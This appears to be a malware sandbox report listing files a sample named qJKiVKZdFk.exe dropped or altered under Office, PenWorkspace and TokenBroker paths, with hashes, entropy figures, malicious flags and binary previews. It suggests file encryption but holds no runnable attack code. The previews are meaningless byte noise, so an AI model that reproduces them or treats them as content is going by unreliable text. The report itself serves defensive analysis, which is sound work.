                                                                                                                                      Preview:.<?N........&.P.T.B..<./..L;.j.F...D.../c.3D.m.._.o.9....y.~..C...........0.FFR..U....3.!5.....`...v...._qpVq...4 .2...g(Sg;"...K....C+.N.e%.q?..t...NJ.l...n.....?..~ai.#..w.l...@....E.Q.Y.?.D?.+.~a..jH.j.%..8.W....\gOD..)...Xe......I....`..a.@..V.2...."q.......,..)...vG<..2m..W&fy.^.sB..\P........q\(.B.*.[2....2.....\..........=.fU.L{.f...z$.."M1q...5=......}....0..../r......,3....1........sRO[..h.P.'..S......ml$.1..z@.]%.4....M.Bn;.u.....Wo..N......Q.p.P.x:F..5..')f........JL....I5a.....a0c.......|.../.....>.6...+On..!..J%q8...E"8.S.......j.60:..+..9!]MV.S.3...o....z...D..|........A...k.rH9M#.)zD,v...%..Y...)A-..k..q{d.(^!.i..[a.{].p..ih.#..Z.!....~..?.X.g.H.d.......F.au.~.|..sh_.G...i..SQ..q..S=.&. .........N....h/...~v...\;.A*.=.7.Y~...-..#IcJ.VB..).mh...5...../..|......$...T.*..#.....LR... _..|.........).....#^....|.nT.W,4..*......<x..IV...".../.34.......Y........VG...{..|Eb"[2w...m.]e..Z!.R.Kp...(.ji&^.[.b..9.....^DW....l...V*t..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700001v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2075
                                                                                                                                      Entropy (8bit):7.898393016814709
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:tnGMUBmTOKW8QdjkkFw+asu9vrTr0NhnblhvHreM8L4CmN7rAEsbID:tnumHfakr+aXzTrcDfr+UJrwU
                                                                                                                                      MD5:C3EAA85CC93F1E6B0236CECAC220AEDC
                                                                                                                                      SHA1:CA7385811149C44BEE3DE8FD677383EA57EE210C
                                                                                                                                      SHA-256:629860FD10CAC630D0888C1DC25A500284530C958A4E8498367BBEFB984EB54A
                                                                                                                                      SHA-512:2E9443C2C1C3B165857490B8F6CE1B562A8318635EB6583ACB3736804ED0D3C28D0CE12CF8A6FFEC4B163EBD3951B2FAFB7874AD861A531F5AB4395F2D919068
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..,v..e.(.....=s.3.1Xc.K&....C...Xq.....L+...5.zz$.......9........Ot8|.=..:pCV.T7..?...9\..(.Ap..w...V%F.IA4.C..<..4.4.H....a.W...2.+.Rp.g.a..&.6..d........D..=8.i......5.....zt9...C.4..........8.JQ..34.....J=u.WR+.....{..._..DIQu.[..s..<..O.o..!...^j...R...t@g..Q..q{;0.3.ySi..iR ......%.".}......i..1e..I..q.......%.^%q.-.HJG......;v.54..@..y\49HO.....]..T..6.....y..7..K...........,r..fn........).P..E..c.,.C....He...NqL.)..a|....)...Y...G.!_.Q.........>.......<p.............Y...3...-J..Q...c...+>{|..K.qqix...Thf*.......'3G.......?[<..T.4...[u...F......l..ebJ.....vc......y.n.~qHo1.b....2=..@iuF[b~.}.pM2..8?...9n.h.m..nr.....G.6O..p.*.....uT5h+D=.'...gpA...E..7*3.=.........(..D.9.k..z..yr..+.3"..Z.U..`..h../C.p..E..o..^......./..#.....;4.mO8....fF:..m...+..x.E.rz..ey......Q}?8.2.A...b..P<......B' .?<.w.b.*.c.u..%..49.u&s_T..B7.i........\.O.!..Ny.&..Nsu8..-...R.^..Si......<.M.........(...G'..l)]..{..?.V.Vn........E..'..zh@.......4.....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70002v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):878
                                                                                                                                      Entropy (8bit):7.748740192205025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uThWCNxZ5hX9Z6qBiWJmVmAhPyGcTQbkvZA7bD:uTh1NxZ/X9ZAGEmIPzccbkRA/D
                                                                                                                                      MD5:138A4D4E980B2DFD2C7CBE1A8C2610F4
                                                                                                                                      SHA1:CE180DA442A410D45149F9F16A98A49772B6C4AD
                                                                                                                                      SHA-256:A9F5547F313D63736BD29535FB378413C78CB2D4F93CAE4DC791CE0A7996B544
                                                                                                                                      SHA-512:11F09793ABC189733985952669D411ECF9A5376D3E3E3EDFBC4D1F87541ED890E910F65BEF2F7D85C0B5B9EA356689CBC8CA400DF621F828DC9D2831FE16C0CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...f..*.......LY?I..........s.53.1.<p.?2.e.V..)..k..uW8..C..%...QTf....F..b.ph...[3..w.k..)..J....$i....+w.=7..W.........0.F9.M...].>..e6.d.eW; V...._.!^b_.h2&@,......p......x...M...~.mW@...M.^gI\..........].............. ..!.J@..z_8..4..%".....;....!..9i.........~..t..Ip.Ev.0.0....9>.P.....`...r..O<?..mU.....gEf.........!.....kT.1...\.n..p.-.....z........?CM..)qS.'....m.;/.q..w...TU..V...:G..hD.....>.X{.+.+...J._..D.C6m},m...5..G.."..<Rs..ab^h?^...o+....5.[.&..i...O...T....z...l..G.t..nf.[....S@&.F2.^.P..U...#..J..F.g~Y...J..(k..~.[Glf q....7....hU~f.M..J...~...Mj.9...>.`uq8Y%.<....i...7e*t4E..*m[...).}.!..J...d..."..@B....X..6.Rt=Q4.}........|..[... ..eRb.|.*..Q.9..f1T.".h.^.&l...l..AU0|s]ol...CX3.smy.m..qh.:T'.........o..,.J..I(.P...^.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70003v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):726
                                                                                                                                      Entropy (8bit):7.686806889452369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:kYdyn/KZLXXfC5lmh7zQ7g5pTbRSbNWJA7ujrzdSzMfZcYukIcii9a:1In/iCmBzQoTbI5WJr/M4fsbD
                                                                                                                                      MD5:CC9F239E05B7E67502357F90667F49E9
                                                                                                                                      SHA1:20DFEDDE9F52D511BF13AEBFDBE2E86AC0D03615
                                                                                                                                      SHA-256:26756D7B02EBF73996D6E8407E0685B717DE83819F6BBE9389AB1A77BA58FF1F
                                                                                                                                      SHA-512:8CA28365094B1ED3EBFD8FBF8B5A5E2C2CBC7A90BE605EE02E496D17517BA4CF6A72512BFE222DB86D4C2EBDA659B0D65425150FC88AFD7B268BF69A84571AC4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..\.I*g...8r5.v..;...`....@...B..%......'.|....q..*...~e....|.>.M$J.Z...]..F._..p.=6#./I..7M...)....?..&V.C..q2.-U.r...F......t...."b.._It..Ut...!m...._L.*. ....m.sb9w|..!"ND...w.g...x<..,.....b...z...&.....1...FfM.G.s...hK.....t..............(F.F:...A:]..$..zi..f7.w..:3+...Z.q.....-.]..s.F..L..SAJ.{.-T.[.-.._....iZ.{"c..r....~.a.N...V.....Od.)....n...*..]..`.Bft...`.o.E.9gP@W.T..q.R6..f%j.....47.{4......??.Jx...nc.."..S..7.....(....uD&..v...+..".D.[x......1?d....._.x.....(..a...w..M..t ..-.I..M..F.i.RO.I..5+..?[.9...._dW...e....7a..!*%8c}O/..Y...H..f"=.....24..,.ea.......H..1.~h=.t......yx...Z...]^..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1098
                                                                                                                                      Entropy (8bit):7.802078890232317
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZKsHg5rBzQnT7eqFEyZ61ptMUB1w3QYoBsuYbD:ZKsHgZBmdbOtp3w3QTs/D
                                                                                                                                      MD5:8235F2FF96B7BD7B5C4A7DEB82DA9F28
                                                                                                                                      SHA1:E2A5DE5EB6203E4F0BD06491BF818CAF6F171E5E
                                                                                                                                      SHA-256:4340E7E567C9A2A8374E0F2C14D9C679B636C4438A4B98FAA8E2E02849C8AF1F
                                                                                                                                      SHA-512:72D4A998CA407460FB56AD13A54CC94921A4E7CD7F4B830C731AD063132323FBCE5D856451CE74452FB6946DDE0D6F46318FF269BCBC6BEAB86667A61E0B3538
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:3.7.4..&.4../..#[5..dr..D....\.fspN.s...Q..[....2J.t.w..0.....1n@:!IX.!..x:h.y.].i..G.....K`.......R..f..U].Y.P...#$....A1..#R...?nDG...\=%"....Z...#1u.?d\.#{eLa.OK..7..e.s..,...v.m..w....#+.J...,1.... X../\.....3..dP.D.u..|;'...qh;...#.S3.V.u3...(O..Tc%=.sk.{.....}'....&.*....s7(-`..O).6n.h...8h.l.. .N|{K.Oax...R...(.....m#..`!Rm.;)....Pi-......H..*...|Y..o..U.,Q......e}b....B[..?.......8../....%.0..Z....r.au]....6<S..........n'..a.....4..5..wE.=}.T,[..{.}.&..x]...=....\.*..,;fK.*nlB.\...f.Nzn&...wfm...9.I..E..DB..q.R.;.8.`.B*.z3)@.;y..w.v...NO.p.#..Qq....\...LH.C...........{.~N.g.<.....].Y....;C.....O.z......,...&....s.rI....vB&qq..X.....c..Jvf/...K...._..F.pC.Xj.z.,.q.1.KlH...s.$.-..mu....h......9Hv..Q.V.._b3.?.....z..O..U...}.......x.*E.5...../U ]......C......{...)..".4...H.v.t............"@......f+.\.P.xrr0....n.Iz....`i.q.R,...dC...sl......b..P1{S.."&~.M..j.z...N..=..lT]7j%f.o.?.,aL..I...lm./..A....E.>.*&..g..BE....T{^..ZN....)

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992864955445798
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:mIhuT33T6/I9M9oscZIQoW+OxuyVcwSImw9rjvEFUlihybHn/AvW+ELJitx6aghC:ciI9MLca0hSI/QRhybHnI+18XY6SK
                                                                                                                                      MD5:F35AECF49D58AD2F0A03F8766AB61816
                                                                                                                                      SHA1:03B3A348B372FFF7E4E9641E3772D318383FA129
                                                                                                                                      SHA-256:9FD083639233EDA0E3C9F42C9CAA030F2E3DB9EC648CDAAAEC988B467D275FCC
                                                                                                                                      SHA-512:527F7627097359F0552715E806F507FE75CA348F955F39F2469643E413C59BC9B43C0F4F8C4AA6EB845D660676E6DF180ACA79A2BDB3F11152074289BA104978
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.?..QM Q.6j40/\%..f"._O.Ld..*....P;.~.O.$Ix4..A.'.g.fR....s..;F../..%..ROE-,....L..E.C.>..f....-+iO*x..L.`.y...........G:8O...d...F......,....,}Cj..k.k9.MsO.<......}.QJ.c./+..nt.X...!^.W...J.I.....a...Y....K.ir.d*.4m..wQY...MO...D..F.r..+3...D....^..........).{M.4.......Vx0e.z2._.!!.^..uyD..jK..z..w"uT........F-.`'b.uO..mC...Z.....[............)2h^Z(!..GSq;r..$....c_.....(....C6vzF.>...e...s...YZd...";...u;u.vm.[}(NN....U.........u4u.L2.\...U.y..._.-...:...DJ..O...Q.$,.F8.i.._.jL..2.u,...E...v....;5+.4L.e.....Z].....5x....Ab.C.DX....kw.5...l>..dg...........9X..+&x.....rQ.D.E..T0.s..%.{D......e.%..g.....^.2....u.P..4.W.......^.H.e..&.b...c..t|hN.tVHo..k-.F..j.mp.c..n..vp.O.X....'...D._a..p...&.._..g.b.3*.....$,..yd.....?.....E._.8.r4A.n-.l.Uy].!wa...2F.J.M.(.....2...Axm.%.p..&..p.a..W.....(.D...&....S..~.z....E....W..> ..D..X...7._T!=.0..i.h.........\..E...h..>1......5......3..U._K5.Y....vGSo.TX-.&..F.^v...)....nF..V...!QM("%.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992619786228708
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:xI4Fc86IRC4MtipL7wFmvPQ2n2uON2Va6jNU:xI4FczilpLKyAukNt
                                                                                                                                      MD5:53E1A701B676E4854676CE2D40218CF3
                                                                                                                                      SHA1:5447989C1585FFD1B0B430072D54543B2DAE0CE4
                                                                                                                                      SHA-256:0622D254946A130E853FF1D10646B605ECE6D4F900FF20F9317A5F540862EEC3
                                                                                                                                      SHA-512:C7AE41CF89782E3437A07D2C7BDAAB1D80E913D7FF9860186A48E796506414516E125A94AD6E93D25C8B5FD3DA1282E18C541740728C570B74626D08CD819B8C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLituq.^...-.K.o.o.x..5.....P.P<....J...."c../.m....H.'ub.2.m..,d.p.<:<.9..V.C[......e.Zx.'..B.>y.m....{.~#._.....n;...\v.mX.OZ.-....Z....;.s......c........0T.........V..< .-.+........BN.J...f.....r..:..3n...........0N?n.l....w>s..`..Iw....D...c+2.*.zH.."hF.>.g!.9.@O...lL.|&.....9.+tx.].5hJ'.....H\#.k..|.Wv.R.3k'..8.....".].D..h...S!.0q.."..3E.:...ke{G[!..($u...p9.Lab..%^".5.<..<..z...`".y......Q.es..W#..4.`.#./.r.\..... ..N_..../p.#.Ca...........h<..5..&.qT."D#.5...;qA|X....u.G..-%.h0....$.........E9e.......y.T...._8!.l.....d.}a{.d...S.cl.%!....a.. ZH....5,...G..UN......#.j.W......'.b..........&Z.rnK...IKH..<.l .}..i..w......jGi$..&>..{3DG...^..h..M....Fm...>...b...R..A\...O......uD..g..C.s..C....B.;r.t..^Y>:...H.-.^..}...4..C}.....PC..0...$6..m]..p^x......i-....=].U..*.6c....N.lE...RR...J.uz~b..49Tl&.....@.Q.J.3...k....aC.5g z .....a..f.{.p,jE.......(.......I.M....].}..X.:{........%n.]...>.W.Kx]..O.(......w.X...f..~...GS0.eD*..l.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992919516232106
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:rtKYCehY8L1v56Zw8+zlDVjhucuBkyI8aH:rtKYCeGOflDVFucQkMaH
                                                                                                                                      MD5:A6FE47CFA0DA05EFA998CEEB2F2DC3AD
                                                                                                                                      SHA1:F24F4669D0E897962B86C4E76CD71DB9F2DE5887
                                                                                                                                      SHA-256:F338904510014C50161302BD2256D4F7C25ABF7A6FA412F4021986933883BFCE
                                                                                                                                      SHA-512:36FCC0086BAE1E0F90705BBC11DD7D36B5C6A00A1DF86BC218D97B7E8807ACC4C7A6F1A5F26F7918FA04FDE8945FEF52A533D7D914FF025BE11A76DB03813980
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit......D.r~Q.h..Z.F1...b./D.Z..e.b..v...)....@.....:{...t@^....ur......#7K$... .D.w....0.2+..F.i;....R.}.^+...X|.m.<..X.V.C...'..O...S..4..E..;#.x.=')..M8.>..GG.....oW.......\.tN.S].....L.....r...=.h......^.A|......7...6....o.w....%.....oBBq....TJ.*.O.+2L..Bqf..".?..u...|..v.^...UJ.B........+...aHw-W..?..^(.nDC...f......I{.~\@.z.y:I.....;..um..vNR...7.R..(4.....FgJ-.R.....Q.p......6.V.5..2...`k..S..1...pq......c.p.PS1(.p...>aV......6~5:..kD....0E...v.?....wx......h.......Hda..|2..z5.W......ILg....|h.C..a$qJk..w.(.*%.ys#.zP....wJ..>..N..E.V.[..=....;......i. ..L.....zP.U.h...-......7.T..A^..jj@.M]..+g`.&..ldl..j.Omm.*...p..%.grO......4..s.$..cf.yD.2.5Sc.>...K.3..f....O$...>uJ........*n.....\.oy7..d..^./..-r..gvL_................;.F.26.#.<.%!34.S......}m"....=.....F..7....O..9..`7ZD4.wG+..-....u.....q;_b.Y'.ZB..;...{......".5N_....&1..A.|.|G..&UWY.?8..!.1...^.....*..6S....&n|.JX8.R....I^}W.6.e....tP. ...m..Gb..L.ui .iD\n..&..4....cZg

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992971417129742
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:K++kBWx10iAuLl04y1z9acYWtScesQwQVtntQ:/+ksb0iAuLl0lTV5nQwIQ
                                                                                                                                      MD5:1FEB2F31537A1BEDCD47C9F2F73C5965
                                                                                                                                      SHA1:9332E0BAADB7FD637E7830B5405C9489C162D055
                                                                                                                                      SHA-256:7525928606DD6879DE19BF28160AC5BC285DC9FD6509D6C06DFB3E7DF1AFAFDD
                                                                                                                                      SHA-512:1C140D6DAB3A3C72003FEB339EFA7F696C4861C404FB2FE2CCA7697CE2758E1640DEDD6317210CED8A7414B92337205013514C08B647962B4B59FE39A1E080A5
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.v.f...eZx.l6...A.~.I.1..cp....K..ki..+.^.Y.P-I..6../.S+D1..$F?..I.t'.3G...G.8.~..&.{........0.l...B....-..3.fO4N....M.. .D..6w.!. .(.6/.w..%.......r.`L..L.1...mn}.w:|C......J.S.O.v....r...U.B."... .H).*[.}...x..Gb...I..K.....&.0U.>.z....}.S.`{.`..;>x....s.n.j...]....hG .j|v..N+B.kD..e..U......O..Y.....+.9h.<..o.......8.|....6.}.;.Xn.6..*W....H+...b|.+uI.\A.!G......z!...?(..=].H.w.zov.%.3..`..bF*r....w.........k./...K..d......#.1".eM.]...}....#xHb.5.qz.....rb...J..7Q.i5..\[@..As_......5....!..!A..aA...7.9....r....F9...FcB..Rn...s9A.G[....c.s0..=G.D#.,.|.....HV.n.3..YT..as.Rl.B....b$.c..yq.YB...q...J.w."... <.....dJz..Q...D._%b.....nm....A+M6^.fo2.5...^E.k...M....._.(o8O....Y...@;.5)s.sB...H...Q.(..OC.93..nK..ND.$...zA..w.....l...6.TT.oH...........'y..`@...2.'bzt..h...-....j.`.Ry..0...,..S......}....d......:\..-A.P.,<....(....x~...f.........k.=..Q>..N.Z.Tg....4.....64O.0.S.....a.......*yT.m.<i..,..$.h.g..-.25.-..Z.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1350
                                                                                                                                      Entropy (8bit):7.847868609681164
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YQSMKGqPlHOQS/Q1QixGldyR/uhQtJjqPs94Ug9fTT4ge6QDlXfsWRKACgrzbD:Y+KnYHNZdOZJJ94UgBT4ga110AVD
                                                                                                                                      MD5:827DA30F257319E5C8ADFD618679AD58
                                                                                                                                      SHA1:98C68B4B23DEE1059E251F72504E3D83E77A580A
                                                                                                                                      SHA-256:AFBB1D0030FC9B3C949B1DA6BF3E245A185474671BA250D656011AD67AA0B4C8
                                                                                                                                      SHA-512:CA60CADE6E214D52144140DB70EFDE1981FA76F73E75D2944ECACE047CD9EF260DE1F87CD65A7C7F433B03014D753871F846E28F033927CB87C1A8554BEC9CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Rec..%.:[....dY..x..7..Cy...R6.1.6H..;.S.........S.}...\sR.$..wO..U.3...nP...a.V...-....98"v+..\Q{f......g..*%..V.|.H.F.1.<....h*.^.r.u.wr........N.L..A.M......A.....F,.o....2.T....ll..5...bxy..U...!.d...O..i.'.A7-.u;.9...*...>.WW{.....Q....o.."!.......Q..Fl.0...)+4'......o.3V........G.].:d.,..1...^....Q..G..4...xg.6.C............#.vM...".....VS~5.._1 CY.R..'..a.2.~w".....M.z...j.r..hYqg.-.....9.!....Z.].._|^a....@.'w...tz...K.....s..Uc[.bJ<.[V|# ?..nB.8.D9O\z...rY1..s.D.#..Y.....1G...Y....5..=......+.i.../..............i......'?A#. n6.a..'.6."..J.1.-..."..b..D..#....E..y.S..?..Kb.X.3.T.Y.~..A.q..693%....9yI...;.B...iw..<..@.bo....]OUZ...t+.*.^#..~...J..4.-.7..im..p3..c{..S..k...4"...GH.=5&C..').Y.hy...v...Q....3. .U.j....."a.\....&....U_( rcR......k.b....... ..<..J.4.:k:..J.A.F.,.A..H.,.d_.V'.f...x..,C..=~f..j[....{.q..(h...5..h..".Gz..7*.Z?6.......@.:.,l...&zi.f'T.\3.%H..d..`..e.Nd.)]m.?'~. k.....wO.x.0./.?..yW...S...?T...w.$...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.929764162400561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:igvErfCmBdvzsjwvXuXlxrYstbpO+PC8YqTAMozlYhtCgK9tD:i/LCmfsmuTrYcbpXRloxSdK9V
                                                                                                                                      MD5:88D818236CA82BD445A41E79DE17D411
                                                                                                                                      SHA1:31DD48972E18A746D59547E9DC73D9D19906A894
                                                                                                                                      SHA-256:4CDCCEDACE692C92D68340A7146808D44BA227D23A86059B4B9C5AAD01450566
                                                                                                                                      SHA-512:D5F1CD9572392FCBDFE075ACB7899F614BC27B5DEFCB0D6DD0519283F47A2C174239C848F7528C75B6CD01571EC3B375461667F162604737E26A2FB12ADD819C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T.n...~........p.....{....k.l....d...b._B.....f.....8..b.-q..Fkw...;x.R.H.nn..ka.c...].qM.Z.J5f.Qk.m.3}....b....We2......F...m.Na....Y....6.....0.............q..9y....!l]=.u..G.I._6...u...,On.r.....|.+.O...+.......m.z.....JU...#......F...!QI..D.Ni.......ps..~j>.c.;.j.....|.n...$..T.P<cW.M|(2...<@..F......b.[G..Q.s..`..'.........m.4...".K......c.+.T..vS..~.v.^.......$..r.Y.yP.'....j.=X.)..oG@....va..{.-..;...i..n..........^.e..;..f.. ......V..7A..=..H}.R.....I....E3X....X.X..LFR......J..=E....~.6...7u.S..iJ..l@...}.a.3....k....^a&.G...~....+.t.o$.G.. FF..7z..Y..3........./.5...d.(...T..{...N.......)...Y.. o.y]...m......B.&.k.`..7.........h...Rl..V........@.41[_v..GD.G.........q..c..S.?je.T.b^....._.........}.Iw..zp.....pH...,..u[$xy(C9..^..m.....U.1...%..n.GWh.3...G.Z...JN.9T.8[3'w.....e-..wx.O%....F)t..%jH..t.9.z...I=...$..8q<W..HiA.9......X.G.1.H...n}.Zy x..4f=.....c/C.I...|.r....e{I.....{../2,`.|..@.....c.&8a.s}E....:..*(....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.92109457486084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xmT9RHMPd5pg8PRGfjUoWF4XELMOw0stg9CYN33d7mjUqkD:xQud7pP8jyLAtW3ojUZ
                                                                                                                                      MD5:61160148E420B0B449EB6EA677A2A2A5
                                                                                                                                      SHA1:BDF741507DD0711D1A7B473FC20A13030E7E009D
                                                                                                                                      SHA-256:F302E2245945708D5EE994E6B97008527EED962BB863231A37304E08871CD8DE
                                                                                                                                      SHA-512:FDF9ED19EA1228AE95C8AA8EF2001E521061AC932253D9EE10864E48D5216DC2E6F8105C13CB15822C95D5F53EF2D5574D94F5DFAB6E09E8FF4CF503FD7A78CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".Td~.1.`.5K..+.aDONw..=......<?..H.'..T..V...p...R.d.*6.....9.....Ep.;F^......L..V..-,D..|P(...UV.[.N.S.9.%.Z..H.}{+..A.n..1.8...."c9..*......ej.d..s.. C...7..]....|.,.8..7...|7......N.$.$.,....)J....j..19A.p...Q.^e.S.........<..W...].P......M.......2...0]u..x..~1.fw..B...fF...K-.C.t.X.iB...&......i8.c..Z9/..........>.EYOM.|...+g......F..d.....?....Rq.X.....G0.WB...B'$K.1M...g@!.p%<..5<.....n....:.DZ.....t.?.8.......K.._.Y..0.B........1"V.k.Q[~...g.jIuf.....i9.)+.....n.CyY..D)..q..V.j......"..".1._..)E..;..w..Q.FE`..x..x.Gm.%..|..'.m..-=..n..]....k...4VA......7... .y~.._.s.#"..%.........<.&....d.;w._G$.:.._..df..{,.x^..6Q..I...X....d...E...eS.q......'..\b^.2n....f......3.5.|'....{rM.-....\N$.%J..EV..8w.....>...h..j...?......T. .q....f...7..+$y...gC...MR.[.....d.]Y..B...R...O|&.d.e..;. G..N&|{.. Z....../..|....G.N.....9..G.)....>..>Sm.$j..3q.B.L.."e0.....K.q.)j.q...Hc6...Z-x..p...=.o.......#.....].3..a..l..a..t\.%%.....h..)x

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3018
                                                                                                                                      Entropy (8bit):7.9330417609677735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QDCO8LwlJlMLcP9D2xP8+sG79zmcYQ+Tvmds9bFr8zygKMBPD:QDOulMLcGU+N79zmc76OdubOrKMV
                                                                                                                                      MD5:C5BDE699DAB236DAFD5217058ABDC0D7
                                                                                                                                      SHA1:691A5A636DB52DE9DCC260BC937BA9F2792A08B7
                                                                                                                                      SHA-256:9CAD6745D7AB7D15973ADB012F2B1DCB9F0DDAC29D55AA7B0D7B84D9365BF3CB
                                                                                                                                      SHA-512:A2587CE81D8EA743BC7AF0288783B871AFCA51C73017FD7FC4D45392623010D470A923CCEBA75BCFDFF13EF945486CE2855748DA564C524088E0AA3071DA5633
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TV.lA......GkE...B.. ...H(.L9.V..Zd.s.B.YUy.eB.1..l.VN.*Z..;..T...+.0..r+..z6...S....>..K.^J.K,.F.F.l.Q.].yl..<.......+.. ...&.L)...Z.....&.Wf..~.K.k9..6).V.@N..|0...8....R.x]..4..PG{.........?..o.Q.....H...........0y.c.W.d...p....D..m.......9..'.2.6.?4{=.>...h.;..e.}.F.{H....6.;.x.oB..`..|.S.'...J>i.u........B.x*..~...J..X....._7..M...7.-.U....L]..c.0t......5....y.3....Jf.w#.{.o|........(%.....4..4.\Zv.[f8...4o.n..u...s1..4~q^N.Y..io..?qa..4.~<:g{6.G."....Mp.....N.\.<..hG.......CE......%.._..V~.d.D..<...~..*J`...;......[..rc|..k....HY,./....])!.....S>RHA.....+...*..p\...7F...^...`e./|!j...9N.3Q4..6.......c,.%..ag.RS.}m....~.@......'........oy..$..$...^.Pcp.......b../4..7...K__...cd%.B.}....x4l..<..kQW./.HK|g...1j?.7....oHD#.1...6..0......)=..'..c.3_.&..|....(...V..f......|.,..O...P..@.>.\|..bj2....<.Yf......^r..e.x].X.p..L......s..|F0.S..>$..G.......S.Sy.IvSA=..k.e.....-6..s...@.B..v....:.L......bT.-Y.V.m44.Kck>4.......EIQ.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.932422950967811
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:c2DXrbNEYJc5F8UKz4XhkQSzbgJJOzYJjQWqxMvafvk80aC87QNa4+gaRLkSjGyB:c2DX/jm5F8JQybcgzY9Qnmv801yYSSyB
